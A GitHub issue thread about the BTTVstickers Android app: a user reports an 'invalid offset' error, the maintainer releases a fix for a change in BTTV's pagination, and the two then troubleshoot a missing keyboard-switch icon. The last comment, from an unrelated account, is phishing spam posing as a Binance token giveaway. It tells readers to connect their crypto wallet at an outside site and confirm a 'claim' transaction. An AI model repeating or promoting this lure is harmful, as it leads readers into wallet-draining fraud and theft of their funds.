### ISSUE TITLE
Invalid offset?

### ISSUE THREAD

**Issue by VerraLol** [Drakota/bttvstickers#1]
I was using the android application version of BTTVstickers and one day, it just stopped appearing in the corner of my keyboard. I checked the app and it said this, so I just made an account to show.
![Screenshot_20230217-190612](https://user-images.githubusercontent.com/125712859/219826380-1b31b797-0da5-4360-963f-4ebf460ea294.png)

**Comment by Drakota** [comment]
Hey, thank you for creating an account and for reporting this! I can confirm that I have the same thing on my end, I'll try to investigate this as soon as possible.

**Comment by Drakota** [comment]
I just pushed a [new version](https://github.com/Drakota/bttvstickers/releases/tag/v2.1.1) that is in review right now to publish on Play Store that fixes the issue. There was a weird update to how BTTV does their pagination which seemed to break the offset parameter that I was using. Also it seems that their new pagination have a few issues regarding duplicates 
![image](https://user-images.githubusercontent.com/22665836/219844196-269c8887-9dab-458f-a187-99eca06fb638.png)
I was sure this was on my end, but this seems to be a problem for them also
![image](https://user-images.githubusercontent.com/22665836/219844215-c5c96ac1-1939-4a46-9e32-8a8b9be229be.png)
I fully expect that they'll change it soon again or rollback to using the offset parameter. I'm gonna leave this issue open for the moment being to track if there's any regressions.

**Comment by VerraLol** [comment]
Thank you for helping with the issue!

**Comment by VerraLol** [comment]
I just got the updated version which fixed the invalid offset issue! However, I still cannot see the keyboard icon in the corner to swap between Gboard and BTTVstickers. I've tried uninstalling the app and restarting my phone, but it still isn't fixed. Is this an issue on my end?

**Comment by Drakota** [comment]
The keyboard in the bottom right depends on the Android version your phone has (it may be located somewhere else if you don't have gesture navigation enabled), if you've done everything correctly in the tutorial in the settings, you should have added BTTV Stickers as an on-screen keyboard and only then it will show you the keyboard icon to swap. If you already did this, maybe between an Android update it changed some settings, in this case try to follow the procedure again. Hope that helps.

**Comment by VerraLol** [comment]
I tried following the tutorial again, but no luck. I'm updated to the most recent version of Android and haven't had an update in a while. What should I do?

**Comment by Drakota** [comment]
In this case can you provide me the exact Android version you have, phone model/brand? Do you see BTTVStickers in the On-Screen keyboard section in the settings or is it just the button to switch keyboard that doesn't appear?

**Comment by VerraLol** [comment]
I apologize for the late reply! I am on Android 11 and have a Motorola G stylus phone. I see BTTVStickers in the on screen keyboard section, and when I go to type, the button on the keyboard doesn't appear.

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰
